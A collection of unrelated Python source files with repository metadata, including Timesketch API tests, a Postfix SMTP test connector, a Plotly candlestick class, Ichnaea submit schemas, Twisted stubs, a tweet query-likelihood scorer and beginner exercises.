016174c973cc6d5cc9d0073c0db0aed68af4d195 | 75d54a70d42f3790e917569172cde9b6969468cb | /timesketch/api/v1/resources_test.py | 13bf2ad68618a276a6b564f944363ea42a521818 | [
"Apache-2.0"
] | permissive | MarVinPL/timesketch | 792be04b8c9b1cab50bb6b5bf0096498bbc71b5b | 3c63cacef0f4ed4bbe826903ee5d708cc0502bb3 | refs/heads/master | 2021-01-15T20:33:36.816774 | 2015-03-26T08:53:27 | 2015-03-26T08:53:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,786 | py | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for v1 of the Timesketch API."""
import mock
import json
from timesketch.lib.definitions import HTTP_STATUS_CODE_CREATED
from timesketch.lib.definitions import HTTP_STATUS_CODE_BAD_REQUEST
from timesketch.lib.testlib import BaseTest
from timesketch.lib.testlib import MockDataStore
class SketchListResourceTest(BaseTest):
"""Test SketchListResource."""
resource_url = '/api/v1/sketches/'
def test_sketch_list_resource(self):
"""Authenticated request to get list of sketches."""
self.login()
response = self.client.get(self.resource_url)
self.assertEqual(len(response.json['objects']), 1)
self.assertEqual(
response.json['objects'][0][0]['name'], 'Test 1')
self.assert200(response)
class SketchResourceTest(BaseTest):
"""Test SketchResource."""
resource_url = '/api/v1/sketches/1/'
def test_sketch_resource(self):
"""Authenticated request to get a sketch."""
self.login()
response = self.client.get(self.resource_url)
self.assertEqual(len(response.json['objects']), 1)
self.assertEqual(len(response.json['objects'][0]['timelines']), 1)
self.assertEqual(response.json['objects'][0]['name'], 'Test 1')
self.assert200(response)
def test_sketch_acl(self):
"""
Authenticated request to get a sketch that the user do not have read
permission on.
"""
self.login()
response = self.client.get('/api/v1/sketches/2/')
self.assert403(response)
class ViewListResourceTest(BaseTest):
"""Test ViewListResource."""
resource_url = '/api/v1/sketches/1/views/'
def test_post_view_resource(self):
"""Authenticated request to create a view."""
self.login()
data = dict(name='test', query='test', filter='{}')
response = self.client.post(
self.resource_url, data=json.dumps(data),
content_type='application/json')
self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)
class ViewResourceTest(BaseTest):
"""Test ViewResource."""
resource_url = '/api/v1/sketches/1/views/1/'
def test_view_resource(self):
"""Authenticated request to get a view."""
self.login()
response = self.client.get(self.resource_url)
self.assertEqual(len(response.json['objects']), 1)
self.assertEqual(response.json['objects'][0]['name'], 'View 1')
self.assert200(response)
def test_invalid_user_in_view(self):
"""Authenticated request to get a view for another user."""
self.login()
response = self.client.get('/api/v1/sketches/1/views/3/')
self.assert403(response)
def test_invalid_view(self):
"""Authenticated request to get a view for non existing view."""
self.login()
response = self.client.get('/api/v1/sketches/1/views/2/')
self.assert404(response)
class ExploreResourceTest(BaseTest):
"""Test ExploreResource."""
resource_url = '/api/v1/sketches/1/explore/'
expected_response = {
u'meta': {
u'timeline_names': {
u'test': u'Timeline 1'
},
u'timeline_colors': {
u'test': u'FFFFFF'
},
u'es_total_count': 1,
u'es_time': 5
},
u'objects': [
{
u'sort': [
1410593223000
],
u'_type': u'plaso_event',
u'_source': {
u'timestamp': 1410593222543942,
u'message': u'Test event',
u'label': [
u'__ts_star'
],
u'timestamp_desc': u'Content Modification Time',
u'datetime': u'2014-09-13T07:27:03+00:00'
},
u'_score': u'null',
u'_index': u'test',
u'_id': u'test'
}
]
}
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_search(self):
"""Authenticated request to query the datastore."""
self.login()
response = self.client.get(self.resource_url + '?q=test&filter={}')
self.assertDictEqual(response.json, self.expected_response)
self.assert200(response)
class EventResourceTest(BaseTest):
"""Test EventResource."""
resource_url = '/api/v1/sketches/1/event/'
expected_response = {
u'meta': {
u'comments': []
},
u'objects': {
u'timestamp_desc': u'',
u'timestamp': 1410895419859714,
u'label': u'',
u'source_long': u'',
u'source_short': u'',
u'es_index': u'',
u'es_id': u'',
u'message': u'',
u'datetime': u'2014-09-16T19:23:40+00:00'
}
}
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_get_event(self):
"""Authenticated request to get an event from the datastore."""
self.login()
response = self.client.get(
self.resource_url + '?searchindex_id=test&event_id=test')
self.assertDictEqual(response.json, self.expected_response)
self.assert200(response)
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_invalid_index(self):
"""
Authenticated request to get an event from the datastore, but in the
wrong index.
"""
self.login()
response_400 = self.client.get(
self.resource_url + '?searchindex_id=wrong_index&event_id=test')
self.assert400(response_400)
class EventAnnotationResourceTest(BaseTest):
"""Test EventAnnotationResource."""
resource_url = '/api/v1/sketches/1/event/annotate/'
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_post_annotate_resource(self):
"""Authenticated request to create an annotation."""
self.login()
for annotation_type in ['comment', 'label']:
data = dict(
annotation='test', annotation_type=annotation_type,
event_id='test', searchindex_id='test')
response = self.client.post(
self.resource_url, data=json.dumps(data),
content_type='application/json')
self.assertIsInstance(response.json, dict)
self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)
def test_post_annotate_invalid_index_resource(self):
"""
Authenticated request to create an annotation, but in the wrong index.
"""
self.login()
data = dict(
annotation='test', annotation_type='comment',
event_id='test', searchindex_id='invalid_searchindex')
response = self.client.post(
self.resource_url, data=json.dumps(data),
content_type='application/json')
self.assertEquals(response.status_code, HTTP_STATUS_CODE_BAD_REQUEST)
| [
"jberggren@gmail.com"
] | jberggren@gmail.com |
7092c7986651958a2883bb51380909307aebb640 | 10d89f178dc2e0f594c29c76aeef931c9525fbfd | /tests/.stage3_nonssl/verify_client.d/connector.py | 6629e2ada72684fa53ee0ef3791acf9a5f78acaf | [] | no_license | exphost/exphost.postfix | 7398bc629f02f5d8863535f3752e62a3214d0bb0 | abc770f66422b9bffc6b2223c6356cc846047065 | refs/heads/master | 2023-05-14T08:01:20.293965 | 2021-06-05T07:47:35 | 2021-06-05T08:09:58 | 365,591,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | connector = "nc test.some.example.domain.xyz 25"
def setup_connector(host):
host.ansible(
"command",
"yum install -y nc",
become=True,
check=False,
)
| [
"torgiren@gmail.com"
] | torgiren@gmail.com |
cd3fb7b1c5af5ec78d27e4e22f214c209953131b | 090a4e026addc9e78ed6118f09fd0d7d4d517857 | /graph_objs/candlestick/_decreasing.py | a63b2f5acb3f6c6939a7777ea542936faf4e0bab | [
"MIT"
] | permissive | wwwidonja/new_plotly | 0777365e53ea7d4b661880f1aa7859de19ed9b9a | 1bda35a438539a97c84a3ab3952e95e8848467bd | refs/heads/master | 2023-06-04T19:09:18.993538 | 2021-06-10T18:33:28 | 2021-06-10T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,701 | py | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Decreasing(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "candlestick"
_path_str = "candlestick.decreasing"
_valid_props = {"fillcolor", "line"}
# fillcolor
# ---------
@property
def fillcolor(self):
"""
Sets the fill color. Defaults to a half-transparent variant of
the line color, marker color, or marker line color, whichever
is available.
The 'fillcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["fillcolor"]
@fillcolor.setter
def fillcolor(self, val):
self["fillcolor"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of :class:`new_plotly.graph_objs.candlestick.decreasing.Line`
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of line bounding the box(es).
width
Sets the width (in px) of line bounding the
box(es).
Returns
-------
new_plotly.graph_objs.candlestick.decreasing.Line
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fillcolor
Sets the fill color. Defaults to a half-transparent
variant of the line color, marker color, or marker line
color, whichever is available.
line
:class:`new_plotly.graph_objects.candlestick.decreasing.Lin
e` instance or dict with compatible properties
"""
def __init__(self, arg=None, fillcolor=None, line=None, **kwargs):
"""
Construct a new Decreasing object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`new_plotly.graph_objs.candlestick.Decreasing`
fillcolor
Sets the fill color. Defaults to a half-transparent
variant of the line color, marker color, or marker line
color, whichever is available.
line
:class:`new_plotly.graph_objects.candlestick.decreasing.Lin
e` instance or dict with compatible properties
Returns
-------
Decreasing
"""
super(Decreasing, self).__init__("decreasing")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the new_plotly.graph_objs.candlestick.Decreasing
constructor must be a dict or
an instance of :class:`new_plotly.graph_objs.candlestick.Decreasing`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("fillcolor", None)
_v = fillcolor if fillcolor is not None else _v
if _v is not None:
self["fillcolor"] = _v
_v = arg.pop("line", None)
_v = line if line is not None else _v
if _v is not None:
self["line"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| [
"wwwidonja@gmail.com"
] | wwwidonja@gmail.com |
9d296c259a2e461bf5c93b18863d06131d8b435c | 9e2d79a2cf1dbeaffe8ef897bb53f94af8b5b68c | /ichnaea/api/submit/schema_v0.py | 369e4e1815bfa4d4f1b610b8b794b4d3dfea8f60 | [
"Apache-2.0"
] | permissive | amolk4games/ichnaea | a7d1cbd12b6aa5c0d877fca380080b08fcff24b8 | 907c542da05b428c8e994bce1537390e22b3ca58 | refs/heads/master | 2021-01-19T07:21:54.851167 | 2016-04-08T15:20:37 | 2016-04-08T15:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,408 | py | """
Colander schemata describing the public v1/submit HTTP API.
"""
import colander
from ichnaea.api.schema import (
OptionalBoundedFloatNode,
OptionalIntNode,
OptionalMappingSchema,
OptionalNode,
OptionalSequenceSchema,
OptionalStringNode,
UnixTimeFromString,
)
class BlueV0Schema(OptionalMappingSchema):
key = OptionalStringNode(to_name='macAddress')
age = OptionalIntNode()
name = OptionalStringNode()
signal = OptionalIntNode(to_name='signalStrength')
def deserialize(self, data):
data = super(BlueV0Schema, self).deserialize(data)
if 'macAddress' not in data:
return colander.drop
return data
class CellV0Schema(OptionalMappingSchema):
radio = OptionalStringNode(to_name='radioType')
mcc = OptionalIntNode(to_name='mobileCountryCode')
mnc = OptionalIntNode(to_name='mobileNetworkCode')
lac = OptionalIntNode(to_name='locationAreaCode')
cid = OptionalIntNode(to_name='cellId')
age = OptionalIntNode()
asu = OptionalIntNode()
psc = OptionalIntNode(to_name='primaryScramblingCode')
serving = OptionalIntNode()
signal = OptionalIntNode(to_name='signalStrength')
ta = OptionalIntNode(to_name='timingAdvance')
class WifiV0Schema(OptionalMappingSchema):
key = OptionalStringNode(to_name='macAddress')
age = OptionalIntNode()
channel = OptionalIntNode()
frequency = OptionalIntNode()
radio = OptionalStringNode(to_name='radioType')
signal = OptionalIntNode(to_name='signalStrength')
signalToNoiseRatio = OptionalIntNode()
ssid = OptionalStringNode()
def deserialize(self, data):
data = super(WifiV0Schema, self).deserialize(data)
if 'macAddress' not in data:
return colander.drop
return data
class BaseReportV0Schema(OptionalMappingSchema):
lat = OptionalBoundedFloatNode(to_name='latitude')
lon = OptionalBoundedFloatNode(to_name='longitude')
time = OptionalNode(UnixTimeFromString(), to_name='timestamp')
accuracy = OptionalBoundedFloatNode()
age = OptionalIntNode()
altitude = OptionalBoundedFloatNode()
altitude_accuracy = OptionalBoundedFloatNode(
to_name='altitudeAccuracy')
heading = OptionalBoundedFloatNode()
pressure = OptionalBoundedFloatNode()
radio = OptionalStringNode(to_name='radioType')
speed = OptionalBoundedFloatNode()
source = OptionalStringNode()
class ReportV0Schema(BaseReportV0Schema):
_position_fields = (
'latitude',
'longitude',
'accuracy',
'altitude',
'altitudeAccuracy',
'age',
'heading',
'pressure',
'speed',
'source',
)
@colander.instantiate(to_name='bluetoothBeacons', missing=())
class blue(OptionalSequenceSchema): # NOQA
sequence_item = BlueV0Schema()
@colander.instantiate(to_name='cellTowers', missing=())
class cell(OptionalSequenceSchema): # NOQA
sequence_item = CellV0Schema()
@colander.instantiate(to_name='wifiAccessPoints', missing=())
class wifi(OptionalSequenceSchema): # NOQA
sequence_item = WifiV0Schema()
def deserialize(self, data):
data = super(ReportV0Schema, self).deserialize(data)
if (data is colander.drop or
data is colander.null): # pragma: no cover
return colander.drop
if not (data.get('bluetoothBeacons') or data.get('cellTowers') or
data.get('wifiAccessPoints')):
return colander.drop
top_radio = data.get('radioType', None)
for cell in data.get('cellTowers', ()):
if 'radioType' not in cell or not cell['radioType'] and top_radio:
cell['radioType'] = top_radio
if cell.get('radioType') == 'umts':
cell['radioType'] = 'wcdma'
if 'radioType' in data:
del data['radioType']
position_data = {}
for field in self._position_fields:
if field in data:
position_data[field] = data[field]
del data[field]
if position_data:
data['position'] = position_data
return data
class SubmitV0Schema(OptionalMappingSchema):
@colander.instantiate()
class items(OptionalSequenceSchema): # NOQA
report = ReportV0Schema()
SUBMIT_V0_SCHEMA = SubmitV0Schema()
| [
"hanno@hannosch.eu"
] | hanno@hannosch.eu |
fe972e3f143c34206e2f70eec1e9dd21dc51fb48 | f85c41af07c89af418b7565d289e8237ebe433f1 | /stubs/twisted/web/server.pyi | 201fab94b71c99ae8d97155f18bb20ed7273cc8f | [
"Apache-2.0"
] | permissive | matrix-org/sydent | 3b58e9488ce594b4fc803f9114d9b137a500611c | 77cb99e3fc6a77c3bc2b66005770bd940060fae4 | refs/heads/main | 2023-08-04T09:52:33.984167 | 2023-07-31T10:53:38 | 2023-07-31T10:53:38 | 22,844,878 | 269 | 103 | Apache-2.0 | 2023-09-12T11:17:20 | 2014-08-11T15:52:07 | Python | UTF-8 | Python | false | false | 669 | pyi | from typing import Callable, Optional
from twisted.web import http
from twisted.web.resource import IResource
class Request(http.Request): ...
# A requestFactory is allowed to be "[a] factory which is called with (channel)
# and creates L{Request} instances.".
RequestFactory = Callable[[http.HTTPChannel], Request]
class Site(http.HTTPFactory):
displayTracebacks: bool
def __init__(
self,
resource: IResource,
requestFactory: Optional[RequestFactory] = ...,
# Args and kwargs get passed to http.HTTPFactory. But we don't use them.
*args: object,
**kwargs: object,
): ...
NOT_DONE_YET = object # Opaque
| [
"noreply@github.com"
] | matrix-org.noreply@github.com |
eafab3a40a8fcd6e8f3c5f79a7ab45fb09a1997d | e27333261b8e579564016c71d2061cc33972a8b8 | /development_codes/Backend/.history/UnigramLanguageModelImplementation_20210809204100.py | d1971d7e1650058901c9456feb9356fa2684514b | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | import math
from IPython.display import display
import sys
from BM25implementation import QueryParsers
ALPHA = 0.75
NORMALIZE_PROBABILITY = True
class UnigramLanguageModel:
def __init__(self, tweets_data): #tweets is a pandas dataframe
self.tweets_data = tweets_data
self.wordsCollectionFrequencyDictionary = self.create_words_frequency_dict(tweets_data)
def create_words_frequency_dict(self, tweets_data, collection = True):
word_frequency_dictionary = {}
if collection:
tweets = tweets_data.clean_text.tolist()
for sentence in tweets:
sentence_list = list(sentence.split(" "))
for word in sentence_list:
if word in word_frequency_dictionary:
word_frequency_dictionary[word] += 1
else:
word_frequency_dictionary[word] = 1
else:
for word in tweets_data:
if word in word_frequency_dictionary:
word_frequency_dictionary[word] += 1
else:
word_frequency_dictionary[word] = 1
return word_frequency_dictionary
def calculate_total_no_of_words(self, wordsCollectionFrequencyDictionary):
values = wordsCollectionFrequencyDictionary.values()
total = sum(values)
return total
def calculate_unigram_probability(self, word: str, wordCollectionFrequencyDictionary):
totalNumberOfWords = self.calculate_total_no_of_words(wordCollectionFrequencyDictionary)
try:
value = wordCollectionFrequencyDictionary[word]/totalNumberOfWords
except KeyError as ke:
value = 1/totalNumberOfWords #add one smoothing for documents
print (word, value)
return value
def calculate_interpolated_sentence_probability(self, querySentenceList:list, document, alpha=ALPHA, normalize_probability=NORMALIZE_PROBABILITY):
total_score = 1
documentListOfStrings = list(document.split(" "))
documentWordFrequencyDictionary = self.create_words_frequency_dict(documentListOfStrings, collection = False)
print (querySentenceList)
for word in querySentenceList:
print (word)
score_of_word = alpha*(self.calculate_unigram_probability(word, documentWordFrequencyDictionary)) + 0 #(1 - alpha)*(self.calculate_unigram_probability(word, self.wordsCollectionFrequencyDictionary))
total_score *= score_of_word
if normalize_probability == True:
return total_score
else:
return (math.log(total_score)/math.log(2))
def getQueryLikelihoodModelScore(self, querySentence:list):
querySentenceList = QueryParsers(querySentence).query
self.tweets_data["QueryLikelihoodModelScore"] = self.tweets_data.apply(lambda row: self.calculate_interpolated_sentence_probability(querySentenceList, row.clean_text), axis = 1)
self.tweets_data.sort_values(by='QueryLikelihoodModelScore',ascending=False,inplace=True)
return self.tweets_data
| [
"chiayik_tan@mymail.sutd.edu.sg"
] | chiayik_tan@mymail.sutd.edu.sg |
e80525d3c4e2b38c006b4ba26ad3d3c803612081 | 99c4d4a6592fded0e8e59652484ab226ac0bd38c | /code/batch-1/vse-naloge-brez-testov/DN5-M-155.py | 8589f4c179dad3cc22b745e3fc1e830f8a3794f4 | [] | no_license | benquick123/code-profiling | 23e9aa5aecb91753e2f1fecdc3f6d62049a990d5 | 0d496d649247776d121683d10019ec2a7cba574c | refs/heads/master | 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,706 | py | def unikati(s):
seznam = []
for i in s:
if i not in seznam:
seznam.append(i)
return seznam
def avtor(tvit):
return tvit.split(":")[0]
def vsi_avtorji(tviti):
avtorji = []
for zapis in tviti:
avtorji.append(avtor(zapis))
return unikati(avtorji)
def izloci_besedo(beseda):
return "".join(i for i in beseda if i.isalnum() or i == "-")
def se_zacne_z(tvit, c):
return [izloci_besedo(i) for i in tvit.split() if i.startswith(c)]
def zberi_se_zacne_z(tviti, c):
seznam = []
for tvit in tviti:
seznam += se_zacne_z(tvit, c)
return unikati(seznam)
def vse_afne(tviti):
seznam = []
for i in tviti:
for j in i.split():
if j.startswith("@"):
seznam.append(izloci_besedo(j))
return unikati(seznam)
def vsi_hashtagi(tviti):
seznam = []
for i in tviti:
for j in i.split():
if j.startswith("#"):
seznam.append(izloci_besedo(j))
return unikati(seznam)
def vse_osebe(tviti):
seznam = []
for tvit in tviti:
seznam.append(avtor(tvit))
seznam += vse_afne(tviti)
return unikati(sorted(seznam))
def custva(tviti, hashtagi):
seznam = []
for tvit in tviti:
for hash in hashtagi:
if hash in tvit:
seznam.append(avtor(tvit))
return unikati(sorted(seznam))
def se_poznata(tviti, oseba1, oseba2):
slovar = {}
for tvit in tviti:
slovar[avtor(tvit)] = [izloci_besedo(i) for i in tvit.split() if i.startswith("@")]
try:
if oseba1 in slovar[oseba2] or oseba2 in slovar[oseba1]:
return True
except KeyError:
return False
| [
"lenart.motnikar@gmail.com"
] | lenart.motnikar@gmail.com |
a25e272a7d02407e4dcb9451996d404845773daf | 22bf910b64283b3c15cc4d80542e83fa89e9f09d | /monero_glue/messages/MoneroGetTxKeyRequest.py | b935838df9f412978aeb49278af672fb07c50028 | [
"MIT"
] | permissive | ph4r05/monero-agent | 24ed1aa17d6616b2ae6bcdb7b9997f982f8b7b5d | 0bac0e6f33142b2bb885565bfd1ef8ac04559280 | refs/heads/master | 2022-10-18T06:30:43.550133 | 2021-07-01T16:27:56 | 2021-07-01T16:27:56 | 126,215,119 | 24 | 5 | MIT | 2022-09-23T22:53:44 | 2018-03-21T17:18:21 | Python | UTF-8 | Python | false | false | 1,433 | py | # Automatically generated by pb2py
# fmt: off
from .. import protobuf as p
if __debug__:
try:
from typing import Dict, List # noqa: F401
from typing_extensions import Literal # noqa: F401
except ImportError:
pass
class MoneroGetTxKeyRequest(p.MessageType):
MESSAGE_WIRE_TYPE = 550
def __init__(
self,
address_n: List[int] = None,
network_type: int = None,
salt1: bytes = None,
salt2: bytes = None,
tx_enc_keys: bytes = None,
tx_prefix_hash: bytes = None,
reason: int = None,
view_public_key: bytes = None,
) -> None:
self.address_n = address_n if address_n is not None else []
self.network_type = network_type
self.salt1 = salt1
self.salt2 = salt2
self.tx_enc_keys = tx_enc_keys
self.tx_prefix_hash = tx_prefix_hash
self.reason = reason
self.view_public_key = view_public_key
@classmethod
def get_fields(cls) -> Dict:
return {
1: ('address_n', p.UVarintType, p.FLAG_REPEATED),
2: ('network_type', p.UVarintType, 0),
3: ('salt1', p.BytesType, 0),
4: ('salt2', p.BytesType, 0),
5: ('tx_enc_keys', p.BytesType, 0),
6: ('tx_prefix_hash', p.BytesType, 0),
7: ('reason', p.UVarintType, 0),
8: ('view_public_key', p.BytesType, 0),
}
| [
"dusan.klinec@gmail.com"
] | dusan.klinec@gmail.com |
0db085b02f0f82902740aec7e44bb19ae0918fef | 7b4e9342d42be2b55af5dc23a8abedd672d68e99 | /libs/flows/windows/jweb/flow_container.py | d286652e4bd3a203a05068468b2b900f0cf0c236 | [] | no_license | Amal548/QAMA | af5bb335c92a90b461f1ee9a3870435d83d46802 | b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5 | refs/heads/master | 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | import logging
from time import sleep
from MobileApps.libs.ma_misc import ma_misc
from MobileApps.libs.flows.windows.jweb.home import Home
from MobileApps.libs.flows.web.hp_id.hp_id import HPID
from MobileApps.libs.flows.windows.jweb.auth_plugin import AuthPlugin
from MobileApps.libs.flows.windows.jweb.eventing_plugin import EventingPlugin
from MobileApps.resources.const.windows.const import *
class FlowContainer(object):
def __init__(self, driver):
self.driver = driver
self.fd = {"home": Home(driver),
"hpid": HPID(driver, context="NATIVE_APP"),
"auth_plugin": AuthPlugin(driver),
"eventing_plugin": EventingPlugin(driver)}
@property
def flow(self):
return self.fd
# *********************************************************************************
# ACTION FLOWS *
# *********************************************************************************
# ----------------------- FROM HOME -----------------------------
def flow_load_home_screen(self):
"""
Load to Home screen:
-Launch app
"""
app_name = APP_NAME.JWEB
if not self.fd["home"].verify_menu_button():
self.driver.launch_app(app_name)
if self.fd["home"].verify_window_visual_state_normal():
self.fd["home"].click_maximize_window()
def close_jweb_app(self):
'''
This is a method to close jarvis reference app.
:parameter:
:return:
'''
logging.debug("Closing Jarvis App...")
if self.fd["home"].verify_close_window():
self.fd["home"].click_close_window() | [
"amal.muthiah@hp.com"
] | amal.muthiah@hp.com |
f17b80dc4d7e285090138061fd5c7212a6c11d43 | 89044f6606e3ccfbbca0b0dacc277497e735d5d4 | /lecture02/exercise02-B/template.py | de5bc2e02d30081a54e08b493b21c899c65425fb | [
"MIT"
] | permissive | nd-cse-34872-su21/cse-34872-su21-examples | 10595f1d53ad3a45fd5e293a8705aefd66bf65c9 | 0294bb0964b502bbb8541054977988c4a3b49dab | refs/heads/master | 2023-05-14T09:55:26.573462 | 2021-06-08T14:23:59 | 2021-06-08T14:23:59 | 370,460,163 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | #!/usr/bin/env python3
import sys
# Functions
LEFT_PBB = ('(', '[', '{')
RIGHT_PBB = (')', ']', '}')
def is_pbbmatched(s):
# TODO: Process string s using a stack to determine if the symbols are balanced
return False
# Main execution
def main():
for line in sys.stdin:
line = line.rstrip()
result = 'Yes' if is_pbbmatched(line) else 'No'
print('{:>10}: {}'.format(line, result))
if __name__ == '__main__':
main()
| [
"pbui@nd.edu"
] | pbui@nd.edu |
5ee64de7a0e5c54c20e9a919092352983197fa28 | edbcb34df3f31bda1e90d9926916da8efc24f65d | /app/models.py | 5130107da2b6efca832994dd037e4bf8af4bad4c | [] | no_license | yuansuixin/movies_project | 74281ceeb6cc6e890c7a7e8d3f9a84e13e2ffdc7 | 8cd5dac957e9475c5f61c4dd648718a8cb782981 | refs/heads/master | 2021-04-05T23:30:57.037168 | 2018-03-14T15:36:55 | 2018-03-14T15:36:55 | 125,233,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | from django.db import models
# Create your models here.
# 用户
class User(models.Model):
# 密码
u_password = models.CharField(max_length=32)
# 昵称
u_name = models.CharField(max_length=20,primary_key=True)
# 头像路径
u_icon = models.ImageField(upload_to='icons')
isDelete = models.BooleanField(default=False)
email = models.CharField(null=True,max_length=16)
class Banner(models.Model):
name = models.CharField(max_length=20)
image = models.ImageField(upload_to='image')
desc = models.CharField(max_length=200)
class Movies(models.Model):
title = models.CharField(max_length=100)
desc = models.CharField(max_length=200)
postid = models.IntegerField()
image = models.ImageField(upload_to='image')
like_num = models.IntegerField(default=0)
request_url = models.CharField(max_length=200,null=True)
is_like = models.BooleanField(default=False)
duration = models.CharField(default=0,max_length=16)
class Like(models.Model):
like_user = models.ForeignKey(User)
like_movies = models.ForeignKey(Movies)
| [
"cyss428@163.com"
] | cyss428@163.com |
13b03308cf7b6535f6bf15ad2090240da75658b2 | bfee360e228494749ce1f73f7bc48cf5f4698d3a | /excelplay_echo/core/urls.py | 25ee96a89465e3093bf6586026db47af2fb93213 | [] | no_license | Excel-MEC/excelplay-echo | 0cc1f8d2305c107f95c8e72f7929651ec44c2b0f | 2b062e2a783adb7abeb05420c0761734fa1d368f | refs/heads/master | 2021-04-18T21:26:59.333703 | 2019-01-14T17:34:54 | 2019-01-14T17:34:54 | 126,799,930 | 1 | 1 | null | 2018-10-26T09:13:41 | 2018-03-26T08:47:40 | Python | UTF-8 | Python | false | false | 321 | py | from django.urls import path
from core.views import Submissionform,Problem,handshake
urlpatterns =[
# path('leaderboard',Echoleaderboard.as_view(),name='leaderboard'),
path('submit',Submissionform,name='finalsubmit'),
path('probs',Problem,name='Problems'),
path('handshake',handshake,name='handshake')
]
| [
"kurian.pro@gmail.com"
] | kurian.pro@gmail.com |
859ec81a3750696e6e42c17160e3397d0d0753fb | accdde552cda99d0fa328441bebdc7ce78b74f36 | /venv/Session6I.py | 4f258afe71ea77a573b36943755b33675423d95e | [] | no_license | navnoorsingh13/GW2019PA2 | 056f0b3d293d8a6f3ec149c8de01c96f0d46f826 | b94b2a5e1c6a760a5ada87e3f7a3117da552387d | refs/heads/master | 2022-01-17T13:20:57.446539 | 2019-07-19T10:53:37 | 2019-07-19T10:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | # Pass By Reference
def squareOfNumbers(nums):
for i in range(0, len(nums)):
nums[i] = nums[i] * nums[i]
numbers = [1, 2, 3, 4, 5]
squareOfNumbers(numbers)
print(numbers)
def fun(a, b, c):
pass
fun(a=10, c=20, b=30) | [
"er.ishant@gmail.com"
